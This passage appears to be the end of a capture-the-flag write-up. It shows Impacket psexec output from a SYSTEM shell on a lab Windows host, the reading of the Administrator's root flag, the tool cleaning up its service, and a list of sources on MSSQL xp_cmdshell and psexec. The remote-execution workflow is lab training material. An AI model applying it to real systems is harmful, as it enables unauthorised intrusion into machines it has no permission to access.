Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021 02:30 AM <DIR> .
07/27/2021 02:30 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,702,352,384 bytes free
C:\Windows\system32> type ..\..\Users\Administrator\Desktop\root.txt
REDACTED
C:\Windows\system32> exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.129.16.27.....
[*] Stopping service Cnpn.....
[*] Removing service Cnpn.....
[*] Removing file mVEPDqFf.exe.....The root flag is stored as usual in Desktop directory C:\Users\Administrator\Desktop\root.txt
Source:
https://fileinfo.com/extension/dtsconfig
https://github.com/fortra/impacket/…/mssqlclient.py
https://hackviser.com/tactics/…/mssql#connect
https://www.mssqltips.com/…/enabling-xpcmdshell-in-sql-server/
https://raw.githubusercontent.com/SecureAuthCorp/../psexec.py
Prev
...